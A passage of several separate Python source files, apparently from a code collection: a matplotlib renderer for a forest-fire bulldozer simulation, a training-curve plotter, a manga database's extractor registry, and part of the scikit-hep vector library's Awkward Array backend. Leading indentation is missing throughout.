COLOR_FIRE = "#E68181" # Salmon-Red
EMPTY = CONFIG["cell_symbols"]["empty"]
BURNED = CONFIG["cell_symbols"]["burned"]
TREE = CONFIG["cell_symbols"]["tree"]
FIRE = CONFIG["cell_symbols"]["fire"]
NROWS = CONFIG["grid_shape"]["nrows"]
NCOLS = CONFIG["grid_shape"]["ncols"]
# Assumes that cells values are in ascending order and paired with its colors
COLORS = [COLOR_EMPTY, COLOR_BURNED, COLOR_TREE, COLOR_FIRE]
CELLS = [EMPTY, BURNED, TREE, FIRE]
NORM, CMAP = get_norm_cmap(CELLS, COLORS)
# Local Grid
N_LOCAL = 3 # n x n local grid size
MARKBULL_SIZE = 52
# Global Grid
MARKFSEED_SIZE = 62
MARKLOCATION_SIZE = 62
# Gauge
COLOR_GAUGE = "#D4CCDB" # "Gray-Purple"
CYCLE_SYMBOL = "\U0001f504"
CYCLE_SIZE = 32
# Counts
TREE_SYMBOL = "\U0001f332"
BURNED_SYMBOL = "\ue08a"
def render(env):
grid = env.grid
ca_params, pos, time = env.context
local_grid = moore_n(N_LOCAL, pos, grid, EMPTY)
pos_fseed = env._fire_seed
TITLE = "ForestFireBulldozer"+str(NROWS)+"x"+str(NCOLS)+"-v2"
plt.style.use(FIGSTYLE)
fig_shape = (12, 14)
fig = plt.figure(figsize=FIGSIZE)
fig.suptitle(
TITLE,
font=TITLEFONT,
fontsize=TITLE_SIZE,
**TITLE_POS,
color="0.6",
ha=TITLE_ALIGN
)
ax_lgrid = plt.subplot2grid(fig_shape, (0, 0), colspan=8, rowspan=10)
ax_ggrid = plt.subplot2grid(fig_shape, (0, 8), colspan=6, rowspan=6)
ax_gauge = plt.subplot2grid(fig_shape, (10, 0), colspan=8, rowspan=2)
ax_counts = plt.subplot2grid(fig_shape, (6, 8), colspan=6, rowspan=6)
plot_local(ax_lgrid, local_grid)
plot_global(ax_ggrid, grid, pos, pos_fseed)
plot_gauge(ax_gauge, time)
d = env.count_cells()
counts = d[EMPTY], d[BURNED], d[TREE], d[FIRE]
plot_counts(ax_counts, *counts)
return plt.gcf()
def plot_local(ax, grid):
nrows, ncols = grid.shape
mid_row, mid_col = nrows // 2, nrows // 2
plot_grid(ax, grid, interpolation="none", cmap=CMAP, norm=NORM)
markbull = parse_svg_into_mpl(svg_paths.BULLDOZER)
ax.plot(mid_col, mid_row, marker=markbull, markersize=MARKBULL_SIZE, color="1.0")
def plot_global(ax, grid, pos, pos_fseed):
ax.imshow(grid, interpolation="none", cmap=CMAP, norm=NORM)
# Fire Seed
markfire = align_marker(parse_svg_into_mpl(svg_paths.FIRE), valign="bottom")
ax.plot(
pos_fseed[1],
pos_fseed[0],
marker=markfire,
markersize=MARKFSEED_SIZE,
color=COLOR_FIRE,
)
# Bulldozer Location
marklocation = align_marker(parse_svg_into_mpl(svg_paths.LOCATION), valign="bottom")
ax.plot(
pos[1], pos[0], marker=marklocation, markersize=MARKLOCATION_SIZE, color="1.0"
)
clear_ax(ax)
def plot_gauge(ax, time):
HEIGHT_GAUGE = 0.1
ax.barh(0.0, time, height=HEIGHT_GAUGE, color=COLOR_GAUGE, edgecolor="None")
ax.barh(
0.0,
1.0,
height=0.15,
color="None",
edgecolor="0.86",
)
# Mess with x,y limits for aethetics reasons
INCREASE_LIMS = True
if INCREASE_LIMS:
ax.set_xlim(0 - 0.03, 1 + 0.1) # Breathing room
ax.set_ylim(-0.4, 0.4) # Center the bar
ax.set_xticks([0.0, 1.0]) # Start Time and End Time x ticks
# Set the CA update symbol
ax.set_yticks([0]) # Set symbol position
ax.set_yticklabels(CYCLE_SYMBOL, font=EMOJIFONT, size=CYCLE_SIZE)
ax.get_yticklabels()[0].set_color("0.74") # Light gray
clear_ax(ax, yticks=False)
def plot_counts(ax, counts_empty, counts_burned, counts_tree, counts_fire):
counts_total = sum((counts_empty, counts_burned, counts_tree, counts_fire))
commons = {"x": [0, 1], "width": 0.1}
pc = "1.0" # placeholder color
lv1y = [counts_tree, counts_empty]
lv1c = [COLOR_TREE, COLOR_EMPTY]
lv2y = [0, counts_burned] # level 2 y axis
lv2c = [pc, COLOR_BURNED] # level 2 colors
lv2b = lv1y # level 2 bottom
lv3y = [0, counts_fire]
lv3c = [pc, COLOR_FIRE]
lv3b = [lv1y[i] + lv2y[i] for i in range(len(lv1y))]
# First Level Bars
ax.bar(height=lv1y, color=lv1c, **commons)
# Second Level Bars
ax.bar(height=lv2y, color=lv2c, bottom=lv2b, **commons)
# Third Level Bars
ax.bar(height=lv3y, color=lv3c, bottom=lv3b, **commons)
# Bar Symbols Settings
ax.set_xticks(np.arange(2))
ax.set_xticklabels([TREE_SYMBOL, BURNED_SYMBOL], font=EMOJIFONT, size=34)
# Same colors as bars
for label, color in zip(ax.get_xticklabels(), [COLOR_TREE, COLOR_BURNED]):
label.set_color(color)
# Mess with x,y limits for aethetics reasons
INCREASE_LIMS = True
INCREASE_FACTORS = [0.1, 0.3] # Y axis down, up
if INCREASE_LIMS:
# Makes the bars look long & tall, also centers them
offdown, offup = (
counts_total * INCREASE_FACTORS[i] for i in range(len(INCREASE_FACTORS))
)
ax.set_ylim(
0 - offdown, counts_total + offup
) # It gives breathing room for bars
ax.set_xlim(-1, 2) # It centers the bars
# Grid Settings and Tick settings
# Show marks each quarter
ax.set_yticks(np.linspace(0, counts_total, 3, dtype=int))
# Remove clutter
clear_ax(ax, xticks=False)
# Add back y marks each quarter
ax.grid(axis="y", color="0.94") # Dim gray
|
<reponame>diogo149/doo
from __future__ import division, absolute_import
from __future__ import print_function, unicode_literals
import matplotlib
import matplotlib.pyplot as plt
try:
from .. import utils
except ValueError:
# if using as a standalone script
from d import utils
def plot_training_curves(
data,
title=None,
filename=None,
# markers=["-", "--", "o--", "o-"],
markers=matplotlib.markers.MarkerStyle.filled_markers,
data_cmap=matplotlib.cm.rainbow,
# data_cmap=matplotlib.cm.Set1,
y_styles=["-", "--", "_", ":", ""],
y_cmap=matplotlib.cm.rainbow):
"""
data:
list of dicts with the following keys:
- name: eg. "train loss"
- corresponds to marker in plot
- x: sequence of points eg. time, or epoch number
- x_unit: string, description of unit of x (eg. "time (s)" or "epoch num")
- all dicts must have the same x_unit
- y: sequence of points eg. loss or AUC
- y_unit: string, description of unit of y (eg. "loss" or "AUC")
- data_id
- correspond to color in plot
filename:
to save to a file instead of showing
heavily based on:
http://matplotlib.org/examples/api/two_scales.html
"""
# must be only 1
x_unit, = set(m["x_unit"] for m in data)
y_units = list(utils.toolz.unique(m["y_unit"] for m in data))
if len(y_units) >= 3:
utils.warn_once("Plotting curves with more than 2 y_unit's")
# TODO generic sequence to color given sequence and color map
if len(y_units) > 1:
y_unit_to_color = {y: y_cmap(idx / (len(y_units) - 1))
for idx, y in enumerate(y_units)}
else:
y_unit_to_color = {y_units[0]: y_cmap(0.5)}
data_ids = list(utils.toolz.unique(m["data_id"] for m in data))
if len(data_ids) > 1:
data_id_to_color = {n: data_cmap(idx / (len(data_ids) - 1))
for idx, n in enumerate(data_ids)}
else:
data_id_to_color = {data_ids[0]: data_cmap(0.5)}
names = list(utils.toolz.unique(m["name"] for m in data))
assert len(names) <= len(markers)
# create axes
fig = plt.figure()
# leave space on the right for legend
orig_ax = fig.add_axes([0.1, 0.1, 0.6, 0.8])
axes = [orig_ax]
while len(axes) < len(y_units):
axes.append(axes[-1].twinx())
# plot data
lines = []
line_names = []
for m in data:
ax = axes[y_units.index(m["y_unit"])]
color = data_id_to_color[m["data_id"]]
name_idx = names.index(m["name"])
marker = markers[name_idx]
style = y_styles[y_units.index(m["y_unit"])]
line, = ax.plot(m["x"],
m["y"],
marker + style,
color=color,
# don't fill markers
markerfacecolor='none',
# add marker color back (from markerfacecolor="none")
markeredgecolor=color)
lines.append(line)
line_names.append("{}:{}".format(m["data_id"], m["name"]))
# set colors of y axes
for idx, ax in enumerate(axes):
y_color = y_unit_to_color[y_units[idx]]
ax.set_ylabel(y_units[idx], color=y_color)
for ticklabel in ax.get_yticklabels():
ticklabel.set_color(y_color)
if title is not None:
orig_ax.set_title(title)
orig_ax.set_xlabel(x_unit)
# make font size somehwat small, just in case some line_names are very
# long
fig.legend(lines, line_names, "right", prop={'size': 8})
if filename is None:
fig.show()
else:
fig.savefig(filename)
if __name__ == "__main__":
import numpy as np
t = np.arange(0.01, 10.0, 0.01)
s1 = np.exp(t)
s2 = np.sin(2 * np.pi * t)
plot_training_curves([
dict(name="foo", x=t, y=s1, x_unit="t", y_unit="exp", data_id=0),
dict(name="foo2", x=t, y=s2, x_unit="t", y_unit="sin", data_id=0),
dict(name="foo", x=t, y=s1 * 1.5, x_unit="t", y_unit="exp",
data_id=1),
],
title="this is a test",
filename="foo.png",
)
|
<reponame>nilfoer/mangadb<filename>manga_db/extractor/__init__.py
# some of this code is taken from:
# https://github.com/mikf/gallery-dl/tree/master/gallery_dl by <NAME>
import os
import inspect
import importlib
from typing import List, Iterator, Union, Dict, Type, cast
from .base import BaseMangaExtractor
from ..exceptions import MangaDBException
module_dir: str = os.path.dirname(os.path.realpath(__file__))
# account for being bundled (e.g. using pyinstaller)
# when trying to find data files relative to the main script, sys._MEIPASS can be used
# if getattr(sys, 'frozen', False): # check if we're bundled
# bundle_dir = os.path.abspath(sys._MEIPASS)
# module_dir = os.path.join(bundle_dir, os.path.dirname(__file__))
# the above does not work since python modules are embedded in the exe as a
# compressed ZlibArchive instead of being saved in a normal folder structure
# custom import hooks make sure that normal imports work
# but since we try to import files based on a folders content it won't work
# since __file__ just points to the location at the time of import and
# not to the location in the exe (since that's not possible with a path anyway)
# => either import them by a list of static names or store them
# as data files in the pyinstaller output
# get all modules in dir (except __init__.py) and remove ending
# also possible to specify all names
# don't include base module since empty pattern "" of BaseExtractor matches on everything
modules: List[str] = [f[:-3] for f in os.listdir(module_dir) if not f.startswith("__") and
f != 'base.py' and f.endswith('.py')]
# holds extractor classes already imported extractor modules
_cache: List[Type[BaseMangaExtractor]] = []
# these should never be changed, only new ones can be added!
SUPPORTED_SITES: Dict[Union[int, str], Union[int, str]] = {
# site id, site name
1: "tsumino.com",
2: "nhentai.net",
3: "MangaDex",
4: "Manganelo",
5: "Toonily",
6: "MangaSee123",
7: "MANUAL_ADD",
# site name, id
"tsumino.com": 1,
"nhentai.net": 2,
"MangaDex": 3,
"Manganelo": 4,
"Toonily": 5,
"MangaSee123": 6,
"MANUAL_ADD": 7,
}
MANUAL_ADD = SUPPORTED_SITES["MANUAL_ADD"]
class ManualAddDummyExtractor(BaseMangaExtractor):
site_id = cast(int, MANUAL_ADD)
site_name = cast(str, "MANUAL_ADD")
def find(url: str) -> Type[BaseMangaExtractor]:
"""Find extractor for given url"""
for cls in _list_extractor_classes():
if cls.match(url):
return cls
else:
raise NoExtractorFound(f"No matching extractor found for '{url}'")
def find_by_site_id(site_id: int) -> Type[BaseMangaExtractor]:
"""Find extractor for given site_id"""
for cls in _list_extractor_classes():
if cls.site_id == site_id:
return cls
else:
if site_id == 7:
return ManualAddDummyExtractor
else:
raise NoExtractorFound(f"No matching extractor found for site_id '{site_id}'")
def add_extractor_cls_module(module):
# needed if a class can have more than one pattern
# then add (pattern, class) tuples for all cls in _get_classes_in_module
pass
def _list_extractor_classes() -> Iterator[Type[BaseMangaExtractor]]:
"""
Yields
firstly: Extractor classes from _cache (since their modules were already imported)
secondly: Iterates over all extracotr modules and yields the found Extractor classes
"""
# yield from g is similar to for c in _cache: yield v; but theres way more to it than just that
yield from _cache
for mod_name in modules:
# using relative import with "." package=base of rel import
extr_classes = _get_classes_in_module(importlib.import_module(
"."+mod_name, package=__package__))
# add extr classes of imported modules to cache
_cache.extend(extr_classes)
yield from extr_classes
def _get_classes_in_module(module) -> List[Type[BaseMangaExtractor]]:
"""Returns a list of all subclasses of BaseMangaExtractor in module"""
# get all members if isclass
# and class has URL_PATTERN_RE
# Return all the members of an object in a list of (name, value) pairs
# sorted by name. If the optional predicate argument is supplied, only
# members for which the predicate returns a true value are included
# inspect.getmembers(module, inspect.isclass) also includes imported classes!!!
# -> check that cls module name matches module.__name__
return [insp_tuple[1] for insp_tuple in inspect.getmembers(module, inspect.isclass) if
issubclass(insp_tuple[1], BaseMangaExtractor) and
insp_tuple[1].__module__ == module.__name__]
class NoExtractorFound(MangaDBException):
def __init__(self, msg):
# Call the base class constructor with the parameters it needs
super().__init__(msg)
|
# Copyright (c) 2019-2021, <NAME>, <NAME>, <NAME>, and <NAME>.
#
# Distributed under the 3-clause BSD license, see accompanying file LICENSE
# or https://github.com/scikit-hep/vector for details.
"""
Defines behaviors for Awkward Array. New arrays created with the
.. code-block:: python
vector.Array(...)
function will have these behaviors built in (and will pass them to any derived
arrays).
Alternatively, you can
.. code-block:: python
vector.register_awkward()
to install the behaviors globally, so that any record named ``Vector2D``,
``Vector3D``, ``Vector4D``, ``Momentum2D``, ``Momentum3D``, or ``Momentum4D``
will have these properties and methods.
The Awkward-Vectors-in-Numba extension is also implemented here, since it requires
two non-strict dependencies of Vector: Awkward and Numba. Awkward's ``ak.behavior``
manages this non-strictness well.
"""
import numbers
import types
import typing
import awkward as ak
import numpy
import vector
from vector._backends.numpy_ import VectorNumpy2D, VectorNumpy3D, VectorNumpy4D
from vector._backends.object_ import (
AzimuthalObjectRhoPhi,
AzimuthalObjectXY,
LongitudinalObjectEta,
LongitudinalObjectTheta,
LongitudinalObjectZ,
TemporalObjectT,
TemporalObjectTau,
VectorObject2D,
VectorObject3D,
VectorObject4D,
)
from vector._methods import (
Azimuthal,
AzimuthalRhoPhi,
AzimuthalXY,
Longitudinal,
LongitudinalEta,
LongitudinalTheta,
LongitudinalZ,
Lorentz,
LorentzMomentum,
Momentum,
Planar,
PlanarMomentum,
Spatial,
SpatialMomentum,
Temporal,
TemporalT,
TemporalTau,
Vector2D,
Vector3D,
Vector4D,
VectorProtocol,
)
from vector._typeutils import BoolCollection, ScalarCollection
# Throws an error if awkward is too old
vector._import_awkward()
ArrayOrRecord = typing.TypeVar("ArrayOrRecord", bound=typing.Union[ak.Array, ak.Record])
behavior: typing.Any = {}
# coordinates classes are a formality for Awkward #############################
class CoordinatesAwkward:
lib: types.ModuleType = numpy
class AzimuthalAwkward(CoordinatesAwkward, Azimuthal):
@classmethod
def from_fields(cls, array: ak.Array) -> "AzimuthalAwkward":
"""
Create a :doc:`vector._backends.awkward_.AzimuthalAwkwardXY` or a
:doc:`vector._backends.awkward_.AzimuthalAwkwardRhoPhi`, depending on
the fields in ``array``.
"""
fields = ak.fields(array)
if "x" in fields and "y" in fields:
return AzimuthalAwkwardXY(array["x"], array["y"])
elif "rho" in fields and "phi" in fields:
return AzimuthalAwkwardRhoPhi(array["rho"], array["phi"])
else:
raise ValueError(
"array does not have azimuthal coordinates (x, y or rho, phi): "
f"{', '.join(fields)}"
)
@classmethod
def from_momentum_fields(cls, array: ak.Array) -> "AzimuthalAwkward":
"""
Create a :doc:`vector._backends.awkward_.AzimuthalAwkwardXY` or a
:doc:`vector._backends.awkward_.AzimuthalAwkwardRhoPhi`, depending on
the fields in ``array``, allowing momentum synonyms.
"""
fields = ak.fields(array)
if "x" in fields and "y" in fields:
return AzimuthalAwkwardXY(array["x"], array["y"])
elif "x" in fields and "py" in fields:
return AzimuthalAwkwardXY(array["x"], array["py"])
elif "px" in fields and "y" in fields:
return AzimuthalAwkwardXY(array["px"], array["y"])
elif "px" in fields and "py" in fields:
return AzimuthalAwkwardXY(array["px"], array["py"])
elif "rho" in fields and "phi" in fields:
return AzimuthalAwkwardRhoPhi(array["rho"], array["phi"])
elif "pt" in fields and "phi" in fields:
return AzimuthalAwkwardRhoPhi(array["pt"], array["phi"])
else:
raise ValueError(
"array does not have azimuthal coordinates (x/px, y/py or rho/pt, phi): "
f"{', '.join(fields)}"
)
class LongitudinalAwkward(CoordinatesAwkward, Longitudinal):
@classmethod
def from_fields(cls, array: ak.Array) -> "LongitudinalAwkward":
"""
Create a :doc:`vector._backends.awkward_.LongitudinalAwkwardZ`, a
:doc:`vector._backends.awkward_.LongitudinalAwkwardTheta`, or a
:doc:`vector._backends.awkward_.LongitudinalAwkwardEta`, depending on
the fields in ``array``.
"""
fields = ak.fields(array)
if "z" in fields:
return LongitudinalAwkwardZ(array["z"])
elif "theta" in fields:
return LongitudinalAwkwardTheta(array["theta"])
elif "eta" in fields:
return LongitudinalAwkwardEta(array["eta"])
else:
raise ValueError(
"array does not have longitudinal coordinates (z or theta or eta): "
f"{', '.join(fields)}"
)
@classmethod
def from_momentum_fields(cls, array: ak.Array) -> "LongitudinalAwkward":
"""
Create a :doc:`vector._backends.awkward_.LongitudinalAwkwardZ`, a
:doc:`vector._backends.awkward_.LongitudinalAwkwardTheta`, or a
:doc:`vector._backends.awkward_.LongitudinalAwkwardEta`, depending on
the fields in ``array``, allowing momentum synonyms.
"""
fields = ak.fields(array)
if "z" in fields:
return LongitudinalAwkwardZ(array["z"])
elif "pz" in fields:
return LongitudinalAwkwardZ(array["pz"])
elif "theta" in fields:
return LongitudinalAwkwardTheta(array["theta"])
elif "eta" in fields:
return LongitudinalAwkwardEta(array["eta"])
else:
raise ValueError(
"array does not have longitudinal coordinates (z/pz or theta or eta): "
f"{', '.join(fields)}"
)
class TemporalAwkward(CoordinatesAwkward, Temporal):
@classmethod
def from_fields(cls, array: ak.Array) -> "TemporalAwkward":
"""
Create a :doc:`vector._backends.awkward_.TemporalT` or a
:doc:`vector._backends.awkward_.TemporalTau`, depending on
the fields in ``array``.
"""
fields = ak.fields(array)
if "t" in fields:
return TemporalAwkwardT(array["t"])
elif "tau" in fields:
return TemporalAwkwardTau(array["tau"])
else:
raise ValueError(
"array does not have temporal coordinates (t or tau): "
f"{', '.join(fields)}"
)
@classmethod
def from_momentum_fields(cls, array: ak.Array) -> "TemporalAwkward":
"""
Create a :doc:`vector._backends.awkward_.TemporalT` or a
:doc:`vector._backends.awkward_.TemporalTau`, depending on
the fields in ``array``, allowing momentum synonyms.
"""
fields = ak.fields(array)
if "t" in fields:
return TemporalAwkwardT(array["t"])
elif "E" in fields:
return TemporalAwkwardT(array["E"])
elif "e" in fields:
return TemporalAwkwardT(array["e"])
elif "energy" in fields:
return TemporalAwkwardT(array["energy"])
elif "tau" in fields:
return TemporalAwkwardTau(array["tau"])
elif "M" in fields:
return TemporalAwkwardTau(array["M"])
elif "m" in fields:
return TemporalAwkwardTau(array["m"])
elif "mass" in fields:
return TemporalAwkwardTau(array["mass"])
else:
raise ValueError(
"array does not have temporal coordinates (t/E/e/energy or tau/M/m/mass): "
f"{', '.join(fields)}"
)
class AzimuthalAwkwardXY(AzimuthalAwkward, AzimuthalXY):
__slots__ = ("x", "y")
def __init__(self, x: typing.Any, y: typing.Any) -> None:
self.x = x
self.y = y
@property
def elements(self) -> typing.Tuple[ArrayOrRecord, ArrayOrRecord]:
return (self.x, self.y)
class AzimuthalAwkwardRhoPhi(AzimuthalAwkward, AzimuthalRhoPhi):
__slots__ = ("rho", "phi")
def __init__(self, rho: typing.Any, phi: typing.Any) -> None:
self.rho = rho
self.phi = phi
@property
def elements(self) -> typing.Tuple[ArrayOrRecord, ArrayOrRecord]:
return (self.rho, self.phi)
class LongitudinalAwkwardZ(LongitudinalAwkward, LongitudinalZ):
__slots__ = ("z",)
def __init__(self, z: typing.Any) -> None:
self.z = z
@property
def elements(self) -> typing.Tuple[ArrayOrRecord]:
return (self.z,)
class LongitudinalAwkwardTheta(LongitudinalAwkward, LongitudinalTheta):
__slots__ = ("theta",)
def __init__(self, theta: typing.Any) -> None:
self.theta = theta
@property
def elements(self) -> typing.Tuple[ArrayOrRecord]:
return (self.theta,)
class LongitudinalAwkwardEta(LongitudinalAwkward, LongitudinalEta):
__slots__ = ("eta",)
def __init__(self, eta: typing.Any) -> None:
self.eta = eta
@property
def elements(self) -> typing.Tuple[ArrayOrRecord]:
return (self.eta,)
class TemporalAwkwardT(TemporalAwkward, TemporalT):
__slots__ = ("t",)
def __init__(self, t: typing.Any) -> None:
self.t = t
@property
def elements(self) -> typing.Tuple[ArrayOrRecord]:
return (self.t,)
class TemporalAwkwardTau(TemporalAwkward, TemporalTau):
__slots__ = ("tau",)
def __init__(self, tau: typing.Any) -> None:
self.tau = tau
@property
def elements(self) -> typing.Tuple[ArrayOrRecord]:
return (self.tau,)
def _class_to_name(cls: typing.Type[VectorProtocol]) -> str:
if issubclass(cls, Momentum):
if issubclass(cls, Vector2D):
return "Momentum2D"
elif issubclass(cls, Vector3D):
return "Momentum3D"
elif issubclass(cls, Vector4D):
return "Momentum4D"
else:
if issubclass(cls, Vector2D):
return "Vector2D"
elif issubclass(cls, Vector3D):
return "Vector3D"
elif issubclass(cls, Vector4D):
return "Vector4D"
raise AssertionError(repr(cls))
# the vector class ############################################################
def _yes_record(x: ak.Array) -> typing.Optional[typing.Union[float, ak.Record]]:
return x[0]
def _no_record(x: ak.Array) -> typing.Optional[ak.Array]:
return x
class VectorAwkward:
lib: types.ModuleType = numpy
def __getitem__(
self, where: typing.Any
) -> typing.Optional[typing.Union[float, ak.Array, ak.Record]]:
return super().__getitem__(where) # type: ignore
def _wrap_result(
self,
cls: typing.Any,
result: typing.Any,
returns: typing.Any,
num_vecargs: typing.Any,
) -> typing.Any:
"""
Args:
result: Value or tuple of values from a compute function.
returns: Signature from a ``dispatch_map``.
num_vecargs (int): Number of vector arguments in the function
that would be treated on an equal footing (i.e. ``add``
has two, but ``rotate_axis`` has only one: the ``axis``
is secondary).
Wraps the raw result of a compute function as an array of scalars or an
array of vectors.
"""
if returns == [float] or returns == [bool]:
return result
if all(not isinstance(x, ak.Array) for x in result):
maybe_record = _yes_record
result = [
ak.Array(x.layout.array[x.layout.at : x.layout.at + 1])
if isinstance(x, ak.Record)
else ak.Array([x])
for x in result
]
else:
maybe_record = _no_record
if (
len(returns) == 1
and isinstance(returns[0], type)
and issubclass(returns[0], Azimuthal)
):
first = [x for x in result if isinstance(x, ak.Array)][0]
result = [
x if isinstance(x, ak.Array) else ak.broadcast_arrays(first, x)[1]
for x in result
]
names = []
arrays = []
if returns[0] is AzimuthalXY:
names.extend(["x", "y"])
arrays.extend([result[0], result[1]])
elif returns[0] is AzimuthalRhoPhi:
names.extend(["rho", "phi"])
arrays.extend([result[0], result[1]])
fields = ak.fields(self)
if num_vecargs == 1:
for name in fields:
if name not in ("x", "y", "rho", "phi"):
names.append(name)
arrays.append(self[name])
if "t" in fields or "tau" in fields:
cls = cls.ProjectionClass4D
elif "z" in fields or "theta" in fields or "eta" in fields:
cls = cls.ProjectionClass3D
else:
cls = cls.ProjectionClass2D
return maybe_record(
ak.zip(
dict(zip(names, arrays)),
depth_limit=first.layout.purelist_depth,
with_name=_class_to_name(cls),
behavior=None if vector._awkward_registered else first.behavior,
)
)
elif (
len(returns) == 2
and isinstance(returns[0], type)
and issubclass(returns[0], Azimuthal)
and returns[1] is None
):
first = [x for x in result if isinstance(x, ak.Array)][0]
result = [
x if isinstance(x, ak.Array) else ak.broadcast_arrays(first, x)[1]
for x in result
]
names = []
arrays = []
if returns[0] is AzimuthalXY:
names.extend(["x", "y"])
arrays.extend([result[0], result[1]])
elif returns[0] is AzimuthalRhoPhi:
names.extend(["rho", "phi"])
arrays.extend([result[0], result[1]])
if num_vecargs == 1:
for name in ak.fields(self):
if name not in (
"x",
"y",
"rho",
"phi",
"z",
"theta",
"eta",
"t",
"tau",
):
names.append(name)
arrays.append(self[name])
return maybe_record(
ak.zip(
dict(zip(names, arrays)),
depth_limit=first.layout.purelist_depth,
with_name=_class_to_name(cls.ProjectionClass2D),
behavior=None if vector._awkward_registered else first.behavior,
)
)
elif (
len(returns) == 2
and isinstance(returns[0], type)
and issubclass(returns[0], Azimuthal)
and isinstance(returns[1], type)
and issubclass(returns[1], Longitudinal)
):
first = [x for x in result if isinstance(x, ak.Array)][0]
result = [
x if isinstance(x, ak.Array) else ak.broadcast_arrays(first, x)[1]
for x in result
]
names = []
arrays = []
if returns[0] is AzimuthalXY:
names.extend(["x", "y"])
arrays.extend([result[0], result[1]])
elif returns[0] is AzimuthalRhoPhi:
names.extend(["rho", "phi"])
arrays.extend([result[0], result[1]])
if returns[1] is LongitudinalZ:
names.append("z")
arrays.append(result[2])
elif returns[1] is LongitudinalTheta:
names.append("theta")
arrays.append(result[2])
elif returns[1] is LongitudinalEta:
names.append("eta")
arrays.append(result[2])
fields = ak.fields(self)
if num_vecargs == 1:
for name in fields:
if name not in ("x", "y", "rho", "phi", "z", "theta", "eta"):
names.append(name)
arrays.append(self[name])
if "t" in fields or "tau" in fields:
cls = cls.ProjectionClass4D
else:
cls = cls.ProjectionClass3D
return maybe_record(
ak.zip(
dict(zip(names, arrays)),
depth_limit=first.layout.purelist_depth,
with_name=_class_to_name(cls),
behavior=None if vector._awkward_registered else first.behavior,
)
)
elif (
len(returns) == 3
and isinstance(returns[0], type)
and issubclass(returns[0], Azimuthal)
and isinstance(returns[1], type)
and issubclass(returns[1], Longitudinal)
and returns[2] is None
):
first = [x for x in result if isinstance(x, ak.Array)][0]
result = [
x if isinstance(x, ak.Array) else ak.broadcast_arrays(first, x)[1]
for x in result
]
names = []
arrays = []
if returns[0] is AzimuthalXY:
names.extend(["x", "y"])
arrays.extend([result[0], result[1]])
elif returns[0] is AzimuthalRhoPhi:
names.extend(["rho", "phi"])
arrays.extend([result[0], result[1]])
if returns[1] is LongitudinalZ:
names.append("z")
arrays.append(result[2])
elif returns[1] is LongitudinalTheta:
names.append("theta")
arrays.append(result[2])
elif returns[1] is LongitudinalEta:
names.append("eta")
arrays.append(result[2])
if num_vecargs == 1:
for name in ak.fields(self):
if name not in (
"x",
"y",
"rho",
"phi",
"z",
"theta",
"eta",
"t",
"tau",
):
names.append(name)
arrays.append(self[name])
return maybe_record(
ak.zip(
dict(zip(names, arrays)),
depth_limit=first.layout.purelist_depth,
with_name=_class_to_name(cls.ProjectionClass3D),
behavior=None if vector._awkward_registered else first.behavior,
)
)
elif (
len(returns) == 3
and isinstance(returns[0], type)
and issubclass(returns[0], Azimuthal)
and isinstance(returns[1], type)
and issubclass(returns[1], Longitudinal)
and isinstance(returns[2], type)
and issubclass(returns[2], Temporal)
):
first = [x for x in result if isinstance(x, ak.Array)][0]
result = [
x if isinstance(x, ak.Array) else ak.broadcast_arrays(first, x)[1]
for x in result
]
names = []
arrays = []
if returns[0] is AzimuthalXY:
names.extend(["x", "y"])
arrays.extend([result[0], result[1]])
elif returns[0] is AzimuthalRhoPhi:
names.extend(["rho", "phi"])
arrays.extend([result[0], result[1]])
if returns[1] is LongitudinalZ:
names.append("z")
arrays.append(result[2])
elif returns[1] is LongitudinalTheta:
names.append("theta")
arrays.append(result[2])
elif returns[1] is LongitudinalEta:
names.append("eta")
arrays.append(result[2])
if returns[2] is TemporalT:
names.append("t")
arrays.append(result[3])
elif returns[2] is TemporalTau:
names.append("tau")
arrays.append(result[3])
if num_vecargs == 1:
for name in ak.fields(self):
if name not in (
"x",
"y",
"rho",
"phi",
"z",
"theta",
"eta",
"t",
"tau",
):
names.append(name)
arrays.append(self[name])
return maybe_record(
ak.zip(
dict(zip(names, arrays)),
depth_limit=first.layout.purelist_depth,
with_name=_class_to_name(cls.ProjectionClass4D),
behavior=None if vector._awkward_registered else first.behavior,
)
)
else:
raise AssertionError(repr(returns))
class VectorAwkward2D(VectorAwkward, Planar, Vector2D):
@property
def azimuthal(self) -> AzimuthalAwkward:
return AzimuthalAwkward.from_fields(self)
class MomentumAwkward2D(PlanarMomentum, VectorAwkward2D):
@property
def azimuthal(self) -> AzimuthalAwkward:
return AzimuthalAwkward.from_momentum_fields(self)
class VectorAwkward3D(VectorAwkward, Spatial, Vector3D):
@property
def azimuthal(self) -> AzimuthalAwkward:
return AzimuthalAwkward.from_fields(self)
@property
def longitudinal(self) -> LongitudinalAwkward:
return LongitudinalAwkward.from_fields(self)
class MomentumAwkward3D(SpatialMomentum, VectorAwkward3D):
@property
def azimuthal(self) -> AzimuthalAwkward:
return AzimuthalAwkward.from_momentum_fields(self)
@property
def longitudinal(self) -> LongitudinalAwkward:
return LongitudinalAwkward.from_momentum_fields(self)
class VectorAwkward4D(VectorAwkward, Lorentz, Vector4D):
@property
def azimuthal(self) -> AzimuthalAwkward:
return AzimuthalAwkward.from_fields(self)
@property
def longitudinal(self) -> LongitudinalAwkward:
return LongitudinalAwkward.from_fields(self)
@property
def temporal(self) -> TemporalAwkward:
return TemporalAwkward.from_fields(self)
class MomentumAwkward4D(LorentzMomentum, VectorAwkward4D):
@property
def azimuthal(self) -> AzimuthalAwkward:
return AzimuthalAwkward.from_momentum_fields(self)
@property
def longitudinal(self) -> LongitudinalAwkward:
return LongitudinalAwkward.from_momentum_fields(self)
@property
def temporal(self) -> TemporalAwkward:
return TemporalAwkward.from_momentum_fields(self)
# ak.Array and ak.Record subclasses ###########################################
class VectorArray2D(VectorAwkward2D, ak.Array):
def allclose(
self,
other: VectorProtocol,
rtol: ScalarCollection = 1e-05,
atol: ScalarCollection = 1e-08,
equal_nan: BoolCollection = False,
) -> BoolCollection:
"""
Like ``np.ndarray.allclose``, but for VectorArray2D.
"""
return ak.all(self.isclose(other, rtol=rtol, atol=atol, equal_nan=equal_nan))
behavior["*", "Vector2D"] = VectorArray2D
class VectorRecord2D(VectorAwkward2D, ak.Record):
pass
behavior["Vector2D"] = VectorRecord2D
class VectorArray3D(VectorAwkward3D, ak.Array):
def allclose(
self,
other: VectorProtocol,
rtol: ScalarCollection = 1e-05,
atol: ScalarCollection = 1e-08,
equal_nan: BoolCollection = False,
) -> BoolCollection:
"""
Like ``np.ndarray.allclose``, but for VectorArray3D.
"""
return ak.all(self.isclose(other, rtol=rtol, atol=atol, equal_nan=equal_nan))
behavior["*", "Vector3D"] = VectorArray3D
